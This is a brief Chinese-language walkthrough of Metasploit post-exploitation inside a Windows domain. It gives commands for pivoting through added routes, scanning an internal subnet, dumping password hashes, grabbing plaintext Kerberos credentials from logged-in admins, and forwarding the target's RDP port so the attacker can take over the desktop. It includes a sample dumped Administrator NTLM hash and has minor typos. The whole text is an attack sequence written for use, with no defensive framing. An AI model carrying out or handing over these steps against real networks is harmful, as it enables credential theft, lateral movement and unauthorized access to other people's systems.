MSF 下域内渗透实战
先获取域内机器session
run get_local_subnets //获取本地网络子网掩码
route add 192.168.233.0 255.255.255.0 1 //添加路由表
run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由
run autoroute -s 192.168.2.0/24 //添加动态路由
route print //打印路由表
use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描
use priv //运行注入
run post/windows/gather/hashdump //获取用户名 hash 值
Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
只要是管理员在线或者没有注销。我们可以抓取明文的
kerberos //管理员在线或者没有注销下获取明文
3.收集域环境信息+找到域控
利用msf 的端口转发功能来转发一下,然后登入对方的远程桌面看看。
meterpreter > portfwd add -l 2222 -r 127.0.0.1 -p 3389 //反弹 127.0.0.1 端口 3389 到本地 2222 并监听
meterpreter > portfwd
root@kali:~# netstat -an | grep “2222”
root@kali:~# rdesktop 127.0.0.1:2222
成功登录目标远程桌面。
</